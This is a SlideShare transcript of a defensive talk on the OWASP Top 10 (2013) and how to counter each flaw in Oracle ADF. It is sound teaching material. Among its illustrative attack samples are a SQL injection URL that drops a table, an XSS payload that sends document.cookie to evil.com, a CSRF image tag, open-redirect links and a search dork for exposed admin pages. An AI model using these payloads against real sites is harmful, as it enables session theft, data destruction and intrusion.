SlideShare ist ein Scribd-Unternehmen logo

OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF

•Als PPT, PDF herunterladen•
•
Brian Huff
Brian Huff
Technologie
1 von 36
Top 10 Web Vulnerabilities, and Securing them with ADF Brian “Bex” Huff Chief Software Architect
2 Agenda  Intro  Open Web Application Security Project (OWASP)  Top 10 Web Application Security Vulnerabilities  Countermeasures  References  For the latest version of this presentation, go to SlideShare:  http://slideshare.com/bexmex
Intro  What is OWASP? • http://owasp.org • Worldwide non-profit focused on improving software security • Reaches out to ALL developers: not just security professionals  Who am I? • Oracle ACE Director • Author of 2 books on Oracle Technology • Twitter: @bex  What will you learn? • The top 10 security mistakes that developers make • How to design software with an assurance of security • You don’t need to be a security guru to secure your web apps 3
OWASP Top 10 of 2013 1) Injection 2) Broken Authentication and Session Management 3) Cross Site Scripting 4) Insecure Direct Object References 5) Security Misconfiguration 6) Sensitive Data Exposure (NEW) 7) Missing Function Level Access Control (NEW) 8) Cross Site Request Forgery (CSRF) 9) Using Components with Known Vulnerabilities (NEW) 10) Unvalidated Redirects and Forwards 4
1) Injection  Used when your app sends user-supplied data to other apps • Database, Operating System, LDAP, Web Services  Hackers "inject" their code to run instead of yours • To access unauthorized data, or completely take over remote application  Example: SQL injection attack • String query = "SELECT * FROM products WHERE name='" + request.getParameter("id") +"'";  Code expects a nice parameter in the URL • http://example.com/products?id=123  Hackers could pass this into the URL instead • http://example.com/products?id=';+DROP+TABLE+'products'; 5
Example  Don’t: name your child Robert’); DROP TABLE Students;--  Do: expect SQL Injection 6
Countermeasures  "Connections" between systems are highly vulnerable  Always assume data coming in could be "evil" • Be sure to include "evil" use cases and user stories in your design  Ideally, only allow the user to select among "safe" options • Never allow them to pass data between systems unchecked  If user-input text is needed, use parameterized statements • Clean up quotes, parenthesis, and comments  Use a battle-tested library for protecting your database • ADF prepared statements, OWASP's ESAPI codecs 7
Example // good idea ViewObject studentVO = this.getStudentView(); studentVO.setNamedWhereClauseParam("id", id); // bad idea! ViewObject studentVO = this.getStudentView(); studentVO.setWhereClause("id = " + id); // another bad idea! String query = "select * from students where id=" + id; ViewObject vo = appMod.createViewObjectFromQueryStmt(null,query); 8
ADF Input Validation  Occurs on most components automatically • Additional validate components available for additional filtering • validateLength, validateLongRange, convertDateTime, etc.  Exception: when immediate=true for some components • Can access raw, unfiltered data through managed bean  Hidden fields do not equal secure fields • Expect hackers to tamper with the HTML, and insert their own values • selectOne and selectMany do automatic validation, and are safe  Use caution with custom AJAX layers • Not always subject to ADF input validation 9
2) Broken Authentication and Session Management  HTTP is a "stateless" protocol • Nice and simple: HTTP request, HTTP response • All data must be passed in the request every time  How do we store state? • Client side with cookies • Server side with sessions  Most apps place a "sessionId" in cookies, or in the URL • Problem: now stealing sessionIds is just as good as stealing passwords!  Multiple ways to determine a session ID • packet sniffing -- especially on an open WiFi access point • HttpReferrer logs, if sessionId is in the URL 10
Countermeasures  Assume that a user stole a session ID • Determine how bad this would be in your application  Use SSL everywhere! • Makes it harder for people to “sniff” your session ID  If you cannot use SSL everywhere, use it for logins • Have a cryptographically strong session ID (ADF default) • Have a reasonable timeout, one hour is fine 11
ADF Countermeasures  Don’t pass the jsessionid in the URL, put it in a cookie • Evil sites can sniff your session ID from their referrer logs • Cookies harder to sniff if SSL is enabled  Sample web.xml snippet <session-descriptor> <cookie-name>MYAPPSESSID</cookie-name> <url-rewriting-enabled>false</url-rewriting-enabled> <timeout-secs>3600</timeout-secs> </session-descriptor> 12
3) Cross Site Scripting (XSS)  Sites must "cleanse" user input before displaying it • HTML tags can be very dangerous • If a user can embed a <SCRIPT> tag, all is lost!  Hackers can create URLs to inject their own HTML onto the page • Can be used to do almost any kind of attack!!!  ADF is mostly safe, but occasionally vulnerable • User generated content is usually HTML encoded on the page • <script> becomes &lt;script&gt; • Use caution with the af:resource or f:verbatim tags • Never pass in unencoded data! 13
Example  Example: JSP to draw HTML based on user input • String html = "<input name='item' type='TEXT' value='" + request.getParameter("item") + "'>";  Code expects a nice URL: • http://example.com/buy?item=123  But a hacker could supply this URL: • http://example.com/buy?item='><script>document.location=' http://evil.com/steal/'+document.cookie</script>  Then trick an administrator or superuser to go there • Cookie is stolen, and now evil user can connect as the admin! 14
Countermeasures  Never, ever, ever trust user-submitted content!  Properly "escape" any data before displaying it on web pages • JavaScript parameters, URL parameters, STYLE elements • Remove script tags, and possibly anything with a SRC attribute • Done automatically in ADF, but manually if you bypass ADF and write JS • Use ESAPI to "cleanse" HTML before dumping to page  Do not allow state-change from HTTP GET requests • Otherwise, a rogue IMG tag could delete content • No state change on initial ADF page load!  Set the HttpOnly flag in your response headers • Prevents document.cookie from working in JavaScript 15
4) Insecure Direct Object Reference  Assume my project id is 123  I see a link on “My Projects” page that goes here: • http://example.com/projects/123  If I alter the URL, can I see other people’s projects? • http://example.com/projects/124  Do you only restrict access in the web form?  What if I could "guess" the URL? Could I see the page? • Don't trick yourself into thinking complex URLs are any more secure • Security != Obscurity 16
Countermeasures  Every resource needs a security level • What roles do you need to access certain items? • Access Control Lists are easy to implement, but don’t always scale  All access to that resource should go through the same check • What action are you taking, with what resource? • Put it all in one common codebase for simplicity • May need to run check multiple times, for sub-actions and sub-resources • Unusual behavior? Have additional authentication questions/layers!  Front-end restriction is nice for usability, but not security  Ideally, put all security in the Application Module (model) • Single location to secure multiple views 17
Countermeasures, ctd.  Avoid direct object reference • Use a temporary variable relevant to just that user • Use a cryptographically strong variable  Validate all references, regardless  Validate access to that reference • Read, write, update, delete 18
ADF Global Security Expressions #{securityContext.authenticated} #{securityContext.userName} #{securityContext.userInRole['roleList']} #{securityContext.userInAllRoles['roleList']} #{securityContext.taskflowViewable['target']} #{securityContext.regionViewable['target']} #{securityContext.userGrantedResource['permission']} #{securityContext.userGrantedPermission['permission']} 19
5) Security Misconfiguration  Everything from the OS to the DB to the ADF framework  What if ADF issued a security patch? • Do you have a centralized policy for keeping dependencies up-to-date? • How long would it take you to discover new code? • How long would it take to recompile/test/redeploy?  Do you know all security configurations in the framework? • Odds are no... documentation is usually obtuse • “Being helpful is a security hole”  Have you properly "hardened" your infrastrurcture? • Delete default users, disable unused services and ports • Operating System, WebLogic, Database, MDS 20
Countermeasures  Subscribe to newsletters and blog feeds to get patches • Use automation if possible to verify patches  Do periodic scans to detect misconfiguration / missing patches  Disable ports/services/features unused in production  Disable default users and passwords  Never send stack traces or SQL errors directly to end users  Taking over websites shouldn't be this easy: • http://www.google.com/search? q=inurl:SELECT+inurl:FROM+inurl:WHERE+intitle:phpmyadmin 21
6) Sensitive Data Exposure  All applications store sensitive data • Credit cards, passwords, private health/financial documents  Where does this data get stored? • Database, files, logs, backups, etc.  Where does this data get sent? • Over the web, backup databases, partners, internal emails • JMS queue, web service calls  How are you preventing unauthorized access to all these resources? 22
Storage Layer Countermeasures  If you store secrets, encrypt them! • Use only battle-tested standard encryption algorithms  Analyze possible threats: inside attack, external user • Make sure encryption policy is appropriate for the threats  Encrypt data anywhere it's stored long term • Especially backups! • Store backups of decryption keys separately from data  Restrict access to decrypted data to only authorized users  Hash all passwords with a standard algorithm, and a "salt"  Use strong keys to access the information  Create a password management policy, and stick with it! 23
Sane Pass Phrase Management Policy 24
Transport Layer Countermeasures  Use strong, standards compliant network security protocols • Use TLS (SSL) on all connections with sensitive data  Encrypt messages before transmission • XML-Encryption  Sign messages before transmission • XML-Signature  Disable old, flawed encryption algorithms (ie, SSL 2.0) 25
7) Missing Function Level Access Control  Similar to Insecure Direct Object Reference • Need to block specific actions, even if no resource is identified  Example: my project is 123  I will see these URLs on my home page: • http://example.com/project/123 • http://example.com/user/getProjects/  I could fish around and try other URLs as well: • http://example.com/manager/getProjects/ • http://example.com/admin/getProjects/  Would your application prevent this?  Same general issue: • you have front-end security, but not back-end security 26
Countermeasures  Do authentication checks at least twice • Front end UI, and back end Controller  Don't draw URLs to the page if the user cannot access them • Bad usability • Hackers might be tempted to fish around for vulnerabilities  Never assume a URL is allowed • Do back-end checks for access, and state change  Add even more layers as needed: • Does all security information exist in the URL? • Can you authenticate right away? • Might you need to get half way through the request before you know what rights are needed? • What if the user has access, but their behavior is unusual • should you prompt for password again, or perhaps for additional authorization? 27
8) Cross-Site Request Forgery  Evil sites can hijack your browser, and run secure requests: 1) User logs into secure application behind the firewall http://example.com/myApp 1) User goes to "evil" website, or loads up "evil" HTML email 2) HTML contains this image: <img src="http://example.com/myApp/deleteEverything"></img>  With JavaScript and XSS, evil sites can completely take over your browser • Can browse around your intranet, log into bank accounts • Anything you are currently logged into • Complete control, as long as you stay on the evil site  Unfortunate side-effect of Single-Sign-On 28
Countermeasures  Need a unique token to validate that the request is authentic • The jsessionId is sometimes sufficient, but can be stolen with XSS • More secure: unique token for every HTTP request • If somebody steals your jsessionid, they can only do one request!  Steps to validate every request • Put a random number in the session for the next valid token • Put that token on every HTML web form that causes state change • When processing a request, validate the token • Generate another random token for the next request • Place that token in the session, repeat forever! • NOTE: might not be needed in JSF 2.1  http://blog.eisele.net/2011/02/preventing-csrf-with-jsf-20.html 29
9) Using Components with Known Vulnerabilities  In addition to ADF, you may use other frameworks • Open Source Libraries • OEM Libraries • JavaScript frameworks • JARs and JARs and JARs of fun...  Automated hacker tools can find these dependencies • Unless you are always on the latest stable version, you are vulnerable  All possible attack vectors are open • XSS, injection, CDRF being the most common and most troublesome • Rages from annoying to complete takeover of your servers 30
Countermeasures  At a minimum, manually keep track of dependencies/versions • Developers must justify every JAR they depend on • Must manually keep track of version, and check before each release  Better still, use Maven to perform automated builds • Automatically check your JAR version vs. latest stable release  Both have risks to the build process • What if you have to refactor your code every time the JAR is revised? • Annoying, but a neccessary step to secure your applications 31
10) Unvalidated Redirects and Forwards  Most sites allow redirects to other sites, or pages within the site: • http://example.com/redirect?url=google.com  But, open redirect pages can be used by "phishers" to create links to their site: • http://example.com/redirect?url=evil.com  Link looks like it goes to "example.com", but it goes to "evil.com"  Or, can trick a site user into harming their own site: • http://example.com/redirect?url=/admin.jsp?deleteEverything=true  Sometimes called "phishing holes" 32
ADF Attack Vectors  Common places to do redirects • PagePhaseListener • Download Servlet • Task Flow router  Example code for a redirect: FacesContext fctx = FacesContext.getCurrentInstance(); fctx.getExternalContext().redirect("http://google.com"); 33
Countermeasures  Restrict redirects to a limited number of "trusted" sites  Keep a list of all redirect URLs, and pass the ID in the request, instead of the URL • http://example.com/redirect?urlId=123  Hash the URL with a secret, and pass the hash in the URL • http://example.com/redirect?url=google.com&hash=a1b2c3  Example: does this URL look like a Google Invoice to you? • http://www.google.com/#invoiceId=123&q=oHg5SJYRHA0&btnI=3564  Question: are URL shorteners inherently unsafe? • TinyUrl offers a "preview" feature: others should as well 34
References  OWASP top 10, and associated resources • https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  ADF Code guidelines to prevent security holes: • http://www.oracle.com/technetwork/developer-tools/adf/learnmore/adf- code-guidelines-v1-00-1845659.pdf  JavaScript best practices for ADF • http://www.oracle.com/technetwork/developer-tools/jdev/1-2011-javascript- 302460.pdf  Hardening Fusion Middleware to avoid OWASP issues: • http://antonfroehlich.blogspot.com/2012/06/handling-owasp-top-ten- application.html  JSF and OWASP • http://turbomanage.files.wordpress.com/2009/10/securing-jsf-applications- against-owasp-top-ten-color.pdf 35
36  My Company: http://bezzotech.com  My Blog: http://bexhuff.com  My Slides: http://slideshare.com/bexmex  My Tweets: @bex  My Self: bex@bezzotech.com Questions?

Empfohlen

Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
Information Technology
 
Oracle UCM Implementation Patterns
Oracle UCM Implementation PatternsOracle UCM Implementation Patterns
Oracle UCM Implementation Patterns
Brian Huff
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
DNN
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
Masoud Kalali
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applications
Adeel Javaid
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFish
Markus Eisele
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 

Empfohlen

Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
Information Technology
 
Oracle UCM Implementation Patterns
Oracle UCM Implementation PatternsOracle UCM Implementation Patterns
Oracle UCM Implementation Patterns
Brian Huff
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
DNN
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
Masoud Kalali
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applications
Adeel Javaid
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFish
Markus Eisele
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & Countermeasures
Aung Thu Rha Hein
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
bhumika2108
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
tmd800
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
Geoffrey Vandiest
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application
Md Mahfuzur Rahman
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
Jim Manico
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!
Brian Huff
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
Blueinfy Solutions
 
Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881
Masoud Kalali
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security Ninja
Paul Gilzow
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
ColdFusionConference
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
Jim Manico
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
Drupal security
Drupal securityDrupal security
Drupal security
Techday7
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
Four Kitchens
 
Security vulnerabilities decomposition
Security vulnerabilities decompositionSecurity vulnerabilities decomposition
Security vulnerabilities decomposition
Katy Anton
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
Jim Manico
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a Database
John Ashmead
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
Markus Eisele
 

Weitere ähnliche Inhalte

Was ist angesagt?

Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & Countermeasures
Aung Thu Rha Hein
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
bhumika2108
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
Geoffrey Vandiest
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
Jim Manico
 
Security vulnerabilities decomposition
Security vulnerabilities decompositionSecurity vulnerabilities decomposition
Security vulnerabilities decomposition
Katy Anton
 

Was ist angesagt? (20)

Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & Countermeasures
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
 
Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security Ninja
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
Drupal security
Drupal securityDrupal security
Drupal security
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
 
Security vulnerabilities decomposition
Security vulnerabilities decompositionSecurity vulnerabilities decomposition
Security vulnerabilities decomposition
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
 

Ähnlich wie OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF

Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Michael Pirnat
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 
Defensive programing 101
Defensive programing 101Defensive programing 101
Defensive programing 101
Niall Merrigan
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 

Ähnlich wie OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF (20)

How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a Database
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Owasp top10salesforce
Owasp top10salesforceOwasp top10salesforce
Owasp top10salesforce
 
Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Web security for app developers
Web security for app developersWeb security for app developers
Web security for app developers
 
Defensive programing 101
Defensive programing 101Defensive programing 101
Defensive programing 101
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Web security
Web securityWeb security
Web security
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajan
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdf
 

Mehr von Brian Huff

Integrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenterIntegrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenter
Brian Huff
 
Creating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile ApplicationsCreating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile Applications
Brian Huff
 
FatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio DevelopersFatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio Developers
Brian Huff
 

Mehr von Brian Huff (19)

Top 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud DevelopersTop 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud Developers
 
Switching to Oracle Document Cloud
Switching to Oracle Document CloudSwitching to Oracle Document Cloud
Switching to Oracle Document Cloud
 
AP Automation for EBS or PeopleSoft with Oracle WebCenter
AP Automation for EBS or PeopleSoft with Oracle WebCenterAP Automation for EBS or PeopleSoft with Oracle WebCenter
AP Automation for EBS or PeopleSoft with Oracle WebCenter
 
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
 
Integrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenterIntegrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenter
 
WebCenter Content & Portal Methodology Deep Dive with Case Studies
WebCenter Content & Portal Methodology Deep Dive with Case StudiesWebCenter Content & Portal Methodology Deep Dive with Case Studies
WebCenter Content & Portal Methodology Deep Dive with Case Studies
 
Creating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile ApplicationsCreating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile Applications
 
FatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio DevelopersFatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio Developers
 
Creating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
Creating a Global E-Commerce Website With E-Business Suite and Fusion MiddlewareCreating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
Creating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
 
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
 
Creating and Maintaining An Internationalized Website
Creating and Maintaining An Internationalized WebsiteCreating and Maintaining An Internationalized Website
Creating and Maintaining An Internationalized Website
 
The Top 10 Things Oracle UCM Users Need To Know About WebLogic
The Top 10 Things Oracle UCM Users Need To Know About WebLogicThe Top 10 Things Oracle UCM Users Need To Know About WebLogic
The Top 10 Things Oracle UCM Users Need To Know About WebLogic
 
Oracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best PracticesOracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best Practices
 
Oracle UCM: Web Site Performance Tuning
Oracle UCM: Web Site Performance TuningOracle UCM: Web Site Performance Tuning
Oracle UCM: Web Site Performance Tuning
 
Real World Examples of Succesful Enterprise Content Management Strategies
Real World Examples of Succesful Enterprise Content Management StrategiesReal World Examples of Succesful Enterprise Content Management Strategies
Real World Examples of Succesful Enterprise Content Management Strategies
 
A Pragmatic Strategy for Oracle Enterprise Content Management
A Pragmatic Strategy for Oracle Enterprise Content ManagementA Pragmatic Strategy for Oracle Enterprise Content Management
A Pragmatic Strategy for Oracle Enterprise Content Management
 
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
 
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
 
Enterprise 2.0: What it is, and how you'll fail!
Enterprise 2.0: What it is, and how you'll fail!Enterprise 2.0: What it is, and how you'll fail!
Enterprise 2.0: What it is, and how you'll fail!
 

KĂźrzlich hochgeladen

Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
